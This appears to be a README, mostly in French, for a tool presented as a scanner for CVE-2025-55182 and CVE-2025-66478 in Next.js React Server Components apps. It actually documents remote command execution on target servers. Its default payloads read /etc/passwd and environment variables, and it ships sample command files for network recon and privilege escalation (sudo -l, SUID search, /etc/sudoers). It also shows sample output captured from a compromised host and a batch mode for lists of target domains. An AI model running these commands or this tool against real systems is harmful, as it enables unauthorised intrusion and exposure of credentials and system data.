
A command-line tool for detecting CVE-2025-55182 and CVE-2025-66478 in Next.js applications using React Server Components.
Un outil en ligne de commande pour détecter CVE-2025-55182 et CVE-2025-66478 dans les applications Next.js utilisant React Server Components.
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator
CVE-2025-55182 -d https://example.com
Remarque : Si aucune option de commande n'est fournie, les commandes par défaut sont exécutées.
L'outil exécute ces commandes par défaut :
cat /etc/os-release - Informations sur le système d'exploitationwhoami - Utilisateur actuelpwd - Répertoire de travail actuelid - ID utilisateur et groupesuname -a - Informations systèmehostname -I - Interfaces réseauls -la - Liste des répertoirescat /etc/passwd - Comptes utilisateursenv - Variables d'environnementps aux - Processus en coursL'outil reportgenerator génère automatiquement des rapports professionnels de divulgation de vulnérabilités à partir des résultats de scan.
# Créez un fichier avec les domaines cibles
echo -e "https://cible1.com\nhttps://cible2.com" > subs.txt
# Exécutez le générateur de rapports
reportgenerator
| Option | Description | Défaut |
|---|---|---|
--file | Fichier d'entrée contenant les domaines cibles | subs.txt |
--user | Nom du chercheur pour la section de divulgation | Bhagirath Saxena |
# Utilisation des paramètres par défaut (subs.txt, Bhagirath Saxena)
reportgenerator
# Utilisation d'un fichier cible personnalisé
reportgenerator --file cibles.txt
# Utilisation d'un nom de chercheur personnalisé
reportgenerator --user "John Doe"
# Utilisation des deux options personnalisées
reportgenerator --file mes-cibles.txt --user "Jane Smith"
Les rapports sont générés dans deux répertoires :
textfile/ - Résultats bruts du scan (numérotés : 1.txt, 2.txt, etc.)mdfile/ - Rapports professionnels en markdown (numérotés : 1.md, 2.md, etc.)Remarque : La fonction de numérotation automatique garantit que les rapports existants ne sont jamais écrasés. Les nouveaux scans reprennent à partir du numéro le plus élevé existant.
Chaque rapport généré comprend :
▼ 🎯 CIBLE : https://application-vulnerable.com
▼ 📋 COMMANDES À EXÉCUTER : 10
• cat /etc/os-release
• whoami
• pwd
• id
• uname -a
• hostname -I
• ls -la
• cat /etc/passwd
• env
• ps aux
[1/10] Exécution de : cat /etc/os-release
▼ 💻 INFORMATIONS SYSTÈME
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...
[2/10] Exécution de : whoami
▼ 👤 UTILISATEUR ACTUEL
║ www-data
...
[3/10] Exécution de : pwd
▼ 📂 RÉPERTOIRE ACTUEL
║ /var/www/html
...
[6/10] Exécution de : hostname -I
╔════════════════════════════════════════════════════════════╗
║ Échec de la commande : hostname -I
║ Cette commande n'est peut-être pas disponible ou le serveur l'a rejetée
╚════════════════════════════════════════════════════════════╝
[!] Tentative de commande réseau alternative...
▼ 🌐 INTERFACES RÉSEAU (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║ inet 127.0.0.1/8 scope host lo
║ valid_lft forever preferred_lft forever
...
commands/ :Créez des fichiers de commandes d'exemple pour différents scénarios :
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
| Option | Description | Défaut |
|---|
-d, --domain | URL cible (ajoute automatiquement https:// si aucun protocole) | http://localhost:3000 |
-c, --command | Commande unique à exécuter | - |
-m, --multiple | Commandes multiples séparées par des points-virgules | - |
-f, --file | Fichier contenant les commandes (une par ligne) | - |
-h, --help | Afficher le message d'aide | - |